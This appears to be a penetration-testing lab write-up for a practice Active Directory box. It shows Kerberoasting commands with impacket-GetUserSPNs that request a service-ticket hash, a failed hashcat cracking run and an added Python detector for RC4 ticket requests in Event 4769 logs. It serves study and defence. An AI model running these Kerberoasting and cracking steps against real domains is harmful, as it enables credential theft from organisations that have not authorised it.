Kerberoasting


Kerberoast-able accounts have been identified.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=info@dc.hokkaido-aerospace.com.ccache impacket-GetUserSPNs HOKKAIDO-AEROSPACE.COM/info@dc.hokkaido-aerospace.com -k -no-pass -dc-ip $IP -dc-host dc.hokkaido-aerospace.com 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
ServicePrincipalName                   Name         MemberOf                                           PasswordLastSet             LastLogon                   Delegation 
-------------------------------------  -----------  -------------------------------------------------  --------------------------  --------------------------  ----------
discover/dc.hokkaido-aerospace.com     discovery    CN=services,CN=Users,DC=hokkaido-aerospace,DC=com  2023-12-06 16:42:56.221832  2025-04-25 15:37:13.715478             
maintenance/dc.hokkaido-aerospace.com  maintenance  CN=services,CN=Users,DC=hokkaido-aerospace,DC=com  2023-11-25 14:39:04.869703  <never>

The discovery account has already been compromised, leaving the maintenance account as a valid target.

maintenance User


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=info@dc.hokkaido-aerospace.com.ccache impacket-GetUserSPNs HOKKAIDO-AEROSPACE.COM/info@dc.hokkaido-aerospace.com -k -no-pass -dc-ip $IP -dc-host dc.hokkaido-aerospace.com -request-user maintenance
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
ServicePrincipalName                   Name         MemberOf                                           PasswordLastSet             LastLogon  Delegation 
-------------------------------------  -----------  -------------------------------------------------  --------------------------  ---------  ----------
maintenance/dc.hokkaido-aerospace.com  maintenance  CN=services,CN=Users,DC=hokkaido-aerospace,DC=com  2023-11-25 14:39:04.869703  <never>               
 
 
 
$krb5tgs$23$*maintenance$HOKKAIDO-AEROSPACE.COM$HOKKAIDO-AEROSPACE.COM/maintenance*$7c9815451356105c41b2b103dc4af8f9$...

Kerberoasting the maintenance account returned a TGS-REP hash (etype 23).
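Seen from the domain controller, the request above is logged as Security event 4769 with ticket encryption type 0x17 for a user-account service. The following is an added example, not part of the original write-up: a minimal filter over 4769 records. The event values, the alice and bob users, and the min_services threshold are constructed for illustration.

```python
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23, the encryption type of the $krb5tgs$23$ ticket above

# Constructed 4769 records (values are illustrative, not taken from the lab).
EVENTS = [
    {"TargetUserName": "info@HOKKAIDO-AEROSPACE.COM", "ServiceName": "discovery",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:192.0.2.10"},
    {"TargetUserName": "info@HOKKAIDO-AEROSPACE.COM", "ServiceName": "maintenance",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:192.0.2.10"},
    {"TargetUserName": "alice@HOKKAIDO-AEROSPACE.COM", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:192.0.2.20"},
    {"TargetUserName": "alice@HOKKAIDO-AEROSPACE.COM", "ServiceName": "maintenance",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:192.0.2.20"},
    {"TargetUserName": "bob@HOKKAIDO-AEROSPACE.COM", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:192.0.2.30"},
    {"TargetUserName": "bob@HOKKAIDO-AEROSPACE.COM", "ServiceName": "maintenance",
     "TicketEncryptionType": "0xffffffff", "Status": "0x20", "IpAddress": "::ffff:192.0.2.30"},
]


def is_suspect(ev):
    """True for a successfully issued RC4 service ticket to a user-account service."""
    svc = ev["ServiceName"]
    return (
        int(ev["TicketEncryptionType"], 16) == RC4_HMAC
        and int(ev["Status"], 16) == 0       # ticket was actually issued
        and not svc.endswith("$")            # skip machine accounts
        and svc.lower() != "krbtgt"          # skip TGT-related entries
    )


def find_roasting(events, min_services=1):
    """Group suspect requests by (requester, source IP); keep groups that
    reach min_services distinct service accounts (hypothetical threshold)."""
    hits = defaultdict(set)
    for ev in events:
        if is_suspect(ev):
            hits[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    return {k: sorted(v) for k, v in hits.items() if len(v) >= min_services}


if __name__ == "__main__":
    for (user, ip), services in find_roasting(EVENTS).items():
        print(f"{user} from {ip}: RC4 tickets for {', '.join(services)}")
```

Environments that still have legitimate RC4 clients will need an allow-list on top of this filter; where service accounts are AES-only, any hit is worth a look.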

Password Cracking (Fail)


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ hashcat -a 0 -m 13100 maintenance.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force 
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 1104517645
 
Approaching final keyspace - workload adjusted.           
 
Session..........: hashcat                                
Status...........: Exhausted
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*maintenance$HOKKAIDO-AEROSPACE.COM$HOK...993ef9
Time.Started.....: Fri Apr 25 15:59:33 2025, (3 mins, 22 secs)
Time.Estimated...: Fri Apr 25 16:02:55 2025, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Mod........: Rules (/usr/share/hashcat/rules/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  5589.1 kH/s (6.77ms) @ Accel:128 Loops:38 Thr:1 Vec:16
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 1104517645/1104517645 (100.00%)
Rejected.........: 0/1104517645 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:76-77 Iteration:0-38
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[2179616e6765] -> $HEX[04a156616d6f]
Hardware.Mon.#1..: Util: 80%
 
Started: Fri Apr 25 15:59:32 2025
Stopped: Fri Apr 25 16:02:55 2025

hashcat was unable to crack the TGS-REP hash with rockyou.txt and the best64 rule set.